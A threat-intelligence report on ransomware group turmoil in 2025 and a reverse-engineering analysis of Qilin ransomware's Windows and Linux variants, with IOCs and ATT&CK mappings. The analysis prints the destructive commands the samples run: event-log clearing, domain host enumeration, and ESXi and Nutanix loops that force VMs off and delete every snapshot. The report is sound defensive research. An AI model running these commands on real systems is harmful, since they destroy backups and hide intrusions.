The ransomware landscape is undergoing a turbulent realignment, marked by collapses, takeovers, and unexpected internal betrayals.
Once-dominant groups such as RansomHub, LockBit, Everest, and BlackLock have recently suffered abrupt shutdowns, operational failures, and defacements of their dark web infrastructure, revealing deep instability in the cybercriminal ecosystem.
One of the most significant shifts occurred in late March 2025, when RansomHub, widely considered the most active ransomware group of 2024, disappeared without explanation. The group had risen rapidly by operating a polished Ransomware-as-a-Service (RaaS) model, offering affiliates advanced payloads, reliable payouts, and transparent operations. Its malware supported cross-platform deployment across Windows, Linux, and ESXi systems. But just as RansomHub was consolidating its dominance, its leak site vanished.
Days later, rival group DragonForce publicly claimed it had absorbed RansomHub’s infrastructure and affiliates, even integrating the RansomHub logo into its own branding. Whether this was a hostile takeover, a voluntary merger, or simply opportunistic branding remains unclear—but RansomHub ceased all activity, leaving victims mid-negotiation and sowing confusion.
RansomHub DLS is offline
In parallel, other ransomware leak sites suffered unexpected disruptions. Both LockBit and Everest were targeted by anonymous actors signing "XOXO from Prague". On May 8th, LockBit’s leak site was defaced and replaced with a taunting message:
"Don’t do crime. CRIME IS BAD. xoxo from Prague."
Everest Ransomware DLS
The attacker leaked a full database dump containing chat transcripts and operational data, which was later confirmed by researchers as authentic, severely damaging LockBit’s internal security reputation.
In the case of Everest, however, the incident was limited to a defacement only. Their Tor-based leak site was similarly replaced with the same mocking message, but no internal data was leaked, and the site went offline shortly after. While the identity of group remains unknown, the attacks suggest that ransomware groups themselves are now becoming targets—either of vigilantes, rivals, or external pressure campaigns.
Another particularly notable case is BlackLock, a mid-sized ransomware operation believed to be a rebrand of the former Eldorado group. In March 2025, BlackLock was breached by researchers from Resecurity who exploited an LFI vulnerability in its leak site. They quietly extracted internal data and warned some victims in advance of potential data publication.
Days later, DragonForce publicly defaced the BlackLock site and leaked configuration files, internal chats, and builder artifacts, claiming responsibility for the breach. However, evidence suggests the action may have been coordinated, as BlackLock’s codebase and DragonForce’s appeared to be nearly identical, and BlackLock’s admin showed no resistance. This points to either a soft handover or strategic absorption under DragonForce’s expanding umbrella.
Amid these disruptions, a new contender is rising: Qilin. With a growing presence across forums and ransomware activity trackers, Qilin operates a technically mature infrastructure: payloads built in Rust and C, loaders with advanced evasion features, and an affiliate panel offering Safe Mode execution, network spreading, log cleanup, and automated negotiation tools. Beyond the malware itself, Qilin offers spam services, PB-scale data storage, legal guidance, and a full set of operational features—positioning itself not just as a ransomware group, but as a full-service cybercrime platform.
As older operations collapse under pressure, betrayal, or reorganization, Qilin is stepping in, not only to fill the void, but to redefine the ransomware-as-a-service model for the next generation of affiliates.
Qilin is a ransomware-as-a-service (RaaS) group that has been active since October 2022, steadily building its reputation through a series of high-impact cyberattacks across various industries. The group operates by providing its ransomware tools and infrastructure to affiliates, taking a 15–20% share of the ransom payments.
Qilin has grown increasingly active over the past year, with more than 50 attacks claimed in recent months and over 100 organizations listed on its dark web leak site. Once they gain access to a network, they steal sensitive data, disrupt systems, and publish stolen information if victims refuse to pay. Ransom demands usually range from $50,000 to $800,000, making it a flexible and financially motivated threat actor.
In February 2024, reports emerged that Qilin was operating a website called “WikiLeaks V2,” where it published data stolen from compromised companies.
The last recorded activity on the website was in April 2025. As of May 2025, the website, which is hosted by OPTIMA LLC.
Qilin wikileaks v2 project old server information (Shodan)
On a Russian darknet forum, Qilin ransomware is promoted as a sophisticated Ransomware-as-a-Service (RaaS) solution, offering a comprehensive set of features designed for versatility and effectiveness. It is marketed as a highly configurable tool capable of adapting to diverse attack scenarios, attracting affiliates with its robust technical capabilities and additional strategic functionalities.
The ransomware employs robust encryption algorithms, including ChaCha20, AES, and RSA-4096, to securely encrypt target data. Operators can tweak it with four modes: normal, step-skip, fast, and percent, letting them prioritize speed or thoroughness.
A notable feature is the “Call Lawyer” function, which provides legal consultation to increase pressure during ransom negotiations. Additionally, with network propagation capabilities and a DDoS option introduced in April 2025, Qilin enhances its adaptability for various attack scenarios.
Key Options:
Below is detailed information on how the Qilin ransomware is offered as a Ransomware-as-a-Service (RaaS) and its key features.
Translation:
Briefly about the available functionality:
Panel:
The software is a unique project, not just another fork of open-source payloads.
The build is written in pure Rust, which gives it speed and security advantages.
For LINUX/ESXI systems, it’s written in pure C.
Qilin explicitly instructs its affiliates not to target systems located in CIS countries
The DDOS option was added to the panel in April 2025.
Additional most interesting options:
“Qilin has introduced several new features in its latest version:
Translation:
“A new feature has been added to our panel: legal assistance.
If you need legal consultation regarding your target, simply click the “Call lawyer” button located within the target interface, and our legal team will contact you privately to provide qualified legal support.
The mere appearance of a lawyer in the chat can exert indirect pressure on the company and increase the ransom amount, as companies want to avoid legal proceedings. The benefits of working with the legal department include:
The heatmap below, which illustrates reported host compromises, indicates that Qilin is intensifying its activity and emerging as a growing threat.
Overview
Our team reverse-engineered two samples of the Qilin ransomware: a Rust-based variant targeting Windows and a C-based variant designed for Linux hosts, particularly those running ESXi and other virtualization or server environments. Our goal is to dissect their functionality, uncover their targeting mechanisms, and highlight key differences in their implementation.
By examining these samples, we aim to provide insights into Qilin’s cross-platform strategies and enhance defenses against this evolving threat.
31c3574456573c89d444478772597db40f075e25c67b8de39926d2faa63ca1d8
“Detect it Easy” analysis information
Qilin Loader Operation
Qilin ransomware operates by executing a series of malicious actions on infected systems, all driven by specific command-line parameters, while a password is required to run the sample. Once executed, it uses tools like PsExec to spread across the network, targeting other domain computers for further infection. The ransomware also deletes shadow copies, clears windows event logs to cover its tracks, making detection harder for system administrators.
In addition, it runs a PowerShell command to identify and print ransom notes via any discovered printers, further escalating the attack's impact. The ransomware changes the victim’s desktop wallpaper to deliver its ransom message visually and goes to the extent of dismounting disk images to prevent access to important files.
Additionally, it installs the Active Directory PowerShell (AD PS) module to exploit domain-level privileges, enhancing its ability to control the environment. In the final phase, Qilin deletes its own traces by self-deleting after executing all its malicious actions.
Qilin runs a PowerShell command to identify and print ransom notes via any discovered printers:
powershell -Command Get-Printer | Format-List Name, Driver,shared
Below is a list of commands the ransomware is executing during the execution on Windows systems:
Events log clear
$logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}
Set machine lockscreen image
REG ADD /v LockScreenImagePath /t REG_SZ /d '' /f ; REG ADD /v LockScreenImageUrl / REG_SZ /d ' /v LockScreenImageStatus /t REG_DWORD /d 1 /f
Installing AD PS module to exploit domain-level privileges, enhancing its ability to control the environment
Powershell -Command “ServerManagerCmd.exe -i RSAT-AD-PowerShell;Install-WindowsFeature RSAT-AD-PowerShell;Add-WindowsCapability -Online -Name 'RSAT.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0'-Command "
Self delete command line parameters
/C timeout /T 10 & Del
Checking disk image
Get-DiskImage -ImagePath '' | Select-Object -ExpandProperty Attached
Dismounting disk image
Dismount-DiskImage -ImagePath
Enumerating all domain hosts
-Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Select-Object -ExpandProperty DNSHostName"
-Command "Import-Module ActiveDirectory ; Get-ADComputer -Filter * | Where-Object { Test-Connection -ComputerName $_.DNSHostName -Count 1 -Quiet } | ForEach-Object { $_.DNSHostName }"
Enable Safe Mode with Networking if safe mode parameter was set
BCDEdit.exe /set {current} safeboot network
Additionally the ransomware includes hardcoded (default) blacklist of file extensions that it does not encrypt:
"File_pattern_black_list": "themepack","nls","diapkg", "msi","lnk","exe","scr","bat","drv","rtp","msp","prf","msc","ico","key","ocx","diagcab","diagcfg","pdb","wpx","hlp","icns","rom","dll","msstyles","mod","ps1","ics","hta","bin","cmd","ani","386","lock","cur","idx","sys","com","deskthemepack","shs","theme","mpa","nomedia","spl","cpl","adv","icl","msu"
QILIN Malicious PowerShell Script
The malware includes a specialized PowerShell script that targets VMware vCenter and ESXi hosts.
Key Capabilities of the Script:
The Qilin Windows variant, written in Rust, is a sophisticated ransomware that requires a password to initiate its malicious operations, leveraging command-line parameters to execute a range of destructive actions. It spreads across networks using tools like PsExec, exhibiting worm-like capabilities, while deleting shadow copies and clearing Windows event logs to evade detection. Additionally, it targets VMware environments by enumerating vCenter and ESXi hosts, modifying root passwords, enabling SSH, and deploying payloads across hypervisors, enhancing its reach and impact.
Qilin Ransomware (Linux, C Variant)
In 2022 and 2023, multiple vendors reported that the Qilin ransomware began targeting not only Windows but also Linux hosts. To gain a deeper understanding of its behavior and specific targets, we conducted an in-depth analysis of the Linux variant.
Linux sample hash:The analyzed Qilin sample is written in C. This Linux variant uses no packing or obfuscation, so its malicious intent can be exposed simply by running the strings command.
The ransomware sample has an embedded usage help message, possibly for debugging.
The options available are as follows:
The ransomware requires a password as an argument (--password) before proceeding with data encryption. This is a common technique used to evade dynamic analysis tools, such as sandboxes.
Once the password check succeeds, the ransomware performs analysis of the system it's running on.
The malware calls uname and checks if the malware is running on:
Depending on the detection of ESXi host or Nutanix host, it will perform different actions.
ESXi VSphere
For VMWare ESXi hosts it will execute the following commands:
for I in $(esxcli storage filesystem list | grep 'VMFS-5' | awk '{print $1}'); do
vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk; vmkfstools -U $I/eztDisk;
done
for I in $(esxcli storage filesystem list | grep 'VMFS-6' | awk '{print $1}'); do
vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null;
done
The commands above are intended to perform a fix of a known problem on vSphere 7.0 ESXi hosts that leads to memory exhaustion, to ensure system stability during encryption and coverage of older VSphere installations.
Finally, malware optimizes I/O performance during encryption by increasing the buffer-cache size and reducing the flush interval with the following commands:
esxcfg-advcfg -s 32768 /BufferCache/MaxCapacity
esxcfg-advcfg -s 20000 /BufferCache/FlushInterval
The enumeration and termination of VM processes on an ESXi host:
esxcli vm process list
esxcli vm process kill -t force -w [ID]
Listing all the registered VMs and removing the snapshots are performed with following method:
vim-cmd vmsvc/getallvms
vim-cmd vmsvc/snapshot.removeall [ID] > /dev/null 2>&1
Nutanix CVM
If it detects a Nutanix host, it performs the following actions using the Acropolis CLI interface.
Disable High-Availability (HA) restarts by setting its priority to 0. Disabling HA tells the system not to automatically turn those virtual machines back on if the physical host fails.
for vm_id in `acli vm.list | grep -oP '([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})' | awk '{print $1}'`; do acli vm.update $vm_id ha_priority=0; done
Force power-off all VMs:
for vm_id in `acli vm.list | grep -oP '([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})' | awk '{print $1}'`; do acli vm.force_off $vm_id; done
Silent removal of all the snapshots:
for snap_id in `acli snapshot.list | grep -oP '([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})' | awk '{print $1}'`; do echo \"yes\" | acli snapshot.delete $snap_id; done
Targeted Data
Although this Linux-based sample is clearly aimed at enterprise applications - virtualization platforms like VMware ESXi (and Nutanix), VirtualBox, Xen, and KVM, it still embeds a comprehensive hard-coded list of user-space file extensions and data paths.
Specifically, it encrypts:
1. Virtualization solution folders:
2. Database files:
3. Containers
Once the malware encrypts all target files, it creates a ransom note file suffixed _RECOVER.txt that contains detailed payment instructions and steps for file recovery.
In addition to dropping a ransom notes on disk, the malware also injects its demand into the system’s /etc/motd (Message of the Day), ensuring that every user who logs in via shell is immediately presented with the ransom instructions upon authentication:
By combining hypervisor directory encryption (with explicit checks for ESXi and Nutanix) and a broad sweep of database and container data, the malware ensures maximum disruption across both virtualized infrastructures and traditional Linux workloads.
IP Address
185[.]208.156[.]157 -Ftp data share
185[.]196.10[.]19 - Ftp data share
80[.]64.16[.]87 - Wikileaksv2
SHA-256
Windows version:
31c3574456573c89d444478772597db40f075e25c67b8de39926d2faa63ca1d8
C9707a3bc0f177e1d1a5587c61699975b1153406962d187c9a732f97d8f867c5
Linux version:
13cda19a9bf493f168d0eb6e8b2300828017b0ef437f75548a6c50bfb4a42a09
a7f2a21c0cd5681eab30265432367cf4b649d2b340963a977e70a16738e955ac
Tactic |
ATT&CK Technique (ID) |
TA0002: Execution |
T1569.002 – System Services: Service Execution |
TA0005: Defense Evasion |
T1070.004 – Indicator Removal: File Deletion |
TA0005: Defense Evasion |
T1070.001 – Indicator Removal: Clear Windows Event Logs |
TA0005: Defense Evasion |
T1218 – System Binary Proxy Execution |
TA0007: Discovery |
T1087 – Account Discovery |
TA0007: Discovery |
T1120 – Peripheral Device Discovery |
TA0008: Lateral Movement |
T1675 – ESXi Administration Command |
TA0040: Impact |
T1486 – Data Encrypted for Impact |
TA0040: Impact |
T1490 – Inhibit System Recovery |
Mark Tsipershtein, Security Researcher
Mark Tsipershtein, a security researcher at the Cybereason Security Research Team, focuses on research, analysis automation and infrastructure. Mark has more than 20 years of experience in SQA, automation, and security research.
Evgeny Ananin, Threat Intelligence Analyst
Evgeny is a Threat Intelligence Analyst on the Cybereason Threat Intelligence Team, leveraging Red Teaming expertise and OSINT to investigate adversarial infrastructure and Darknet activities. He previously contributed to advanced malware research and penetration testing.